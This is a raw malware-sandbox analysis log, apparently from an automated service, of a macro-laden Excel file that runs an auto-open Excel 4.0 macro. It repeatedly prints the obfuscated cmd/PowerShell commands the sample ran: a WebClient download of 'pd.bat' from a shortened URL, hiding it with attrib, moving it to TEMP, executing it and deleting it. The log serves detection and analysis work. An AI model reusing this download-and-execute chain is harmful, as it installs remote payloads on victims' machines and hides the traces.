Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0531CB1015_2_0531CB10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_084170A815_2_084170A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0841C76A15_2_0841C76A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0841C77815_2_0841C778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0841BEC815_2_0841BEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0841BED815_2_0841BED8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0841709C15_2_0841709C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08467E0015_2_08467E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_05318B6815_2_05318B68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_05318B5815_2_05318B58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0531EA5015_2_0531EA50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0531EA4115_2_0531EA41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0531929915_2_05319299
Source: SIN029088.xlsOLE indicator, VBA macros: true
Source: SIN029088.xlsOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: SIN029088.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: SIN029088.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: classification engineClassification label: mal80.expl.evad.winXLS@28/31@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5835A2D8.tmpJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5835A2D8.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{527F5A61-258D-4140-896F-A7EC049D3ED0} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{527F5A61-258D-4140-896F-A7EC049D3ED0} - OProcSessId.datJump to behavior
Source: SIN029088.xlsOLE indicator, Workbook stream: true
Source: SIN029088.xlsOLE indicator, Workbook stream: true
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SIN029088.xlsVirustotal: Detection: 7%
Source: SIN029088.xlsVirustotal: Detection: 7%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.472129670.0000000008C05000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.472129670.0000000008C05000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DEB20 push esp; ret 9_2_031DEB33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DEB20 push esp; ret 9_2_031DEB33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C0575A push esp; ret 12_2_00C05759
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C06879 push eax; mov dword ptr [esp], ecx12_2_00C0688C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C06AD0 pushad ; iretd 12_2_00C06AB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C06AD0 push es; ret 12_2_00C06AE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C06A90 push eax; iretd 12_2_00C06A91
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C0ACA8 push eax; mov dword ptr [esp], edx12_2_00C0ACBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C05750 push esp; ret 12_2_00C05759
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C0AF30 push eax; mov dword ptr [esp], edx12_2_00C0B02C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C78EB0 push es; ret 12_2_00C78EC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00F7A438 push eax; mov dword ptr [esp], edx14_2_00F7A44C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00F7A6C0 push eax; mov dword ptr [esp], edx14_2_00F7A7BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00F76638 push eax; mov dword ptr [esp], ecx14_2_00F7664C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F7A42 push esp; ret 15_2_035F7A54
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F7A60 push ebp; ret 15_2_035F7A74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F77E0 push ebp; ret 15_2_035F7A74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0531BE60 push es; ret 15_2_0531BE76
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0531BEC2 push es; ret 15_2_0531BED6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0846FCB8 push ss; retn C308h15_2_0846FFCE
